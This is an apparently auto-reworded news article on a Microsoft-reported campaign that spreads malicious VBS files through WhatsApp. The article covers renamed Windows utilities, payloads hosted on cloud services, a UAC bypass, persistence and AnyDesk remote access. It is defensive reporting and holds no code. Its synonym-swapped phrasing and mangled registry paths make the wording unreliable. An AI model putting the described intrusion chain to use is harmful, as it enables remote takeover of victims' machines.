Microsoft is looking consideration to a brand new marketing campaign that has leveraged WhatsApp messages to distribute malicious Visible Fundamental Script (VBS) information.
The exercise, starting in late February 2026, leverages these scripts to provoke a multi-stage an infection chain for establishing persistence and enabling distant entry. It is at present not identified what lures the menace actors use to trick customers into executing the scripts.
“The marketing campaign depends on a mix of social engineering and living-off-the-land methods,” the Microsoft Defender Safety Analysis Group stated. “It makes use of renamed Home windows utilities to mix into regular system exercise, retrieves payloads from trusted cloud providers reminiscent of AWS, Tencent Cloud, and Backblaze B2, and installs malicious Microsoft Installer (MSI) packages to keep up management of the system.”
Using official instruments and trusted platforms is a lethal mixture, because it permits menace actors to mix in regular community exercise and enhance the probability of success of their assaults.
The exercise begins with the attackers distributing malicious VBS information through WhatsApp messages that, when executed, create hidden folders in “C:ProgramData” and drop renamed variations of official Home windows utilities like “curl.exe” (renamed as “netapi.dll”) and “bitsadmin.exe” (renamed as “sc.exe”).
Upon gaining an preliminary foothold, the attackers purpose to set up persistence and escalate privileges, finally putting in malicious MSI packages on sufferer techniques. That is achieved by downloading auxiliary VBS information hosted on AWS S3, Tencent Cloud, and Backblaze B2 utilizing the renamed binaries.
“As soon as the secondary payloads are in place, the malware begins tampering with Person Account Management (UAC) settings to weaken system defenses,” Redmond stated. “It repeatedly makes an attempt to launch cmd.exe with elevated privileges, retrying till UAC elevation succeeds or the method is forcibly terminated, modifying registry entries underneath HKLMSoftwareMicrosoftWin, and embedding persistence mechanisms to make sure the an infection survives system reboots.”
These actions enable the menace actors to achieve elevated privileges with out consumer interplay through a mix of Registry manipulation with UAC bypass methods, and finally deploy unsigned MSI installers. This consists of official instruments like AnyDesk that present attackers with persistent distant entry, enabling the attackers to exfiltrate knowledge or deploy extra malware.
“This marketing campaign demonstrates a complicated an infection chain combining social engineering (WhatsApp supply), stealth methods (renamed official instruments, hidden attributes), and cloud-based payload internet hosting,” Microsoft stated.
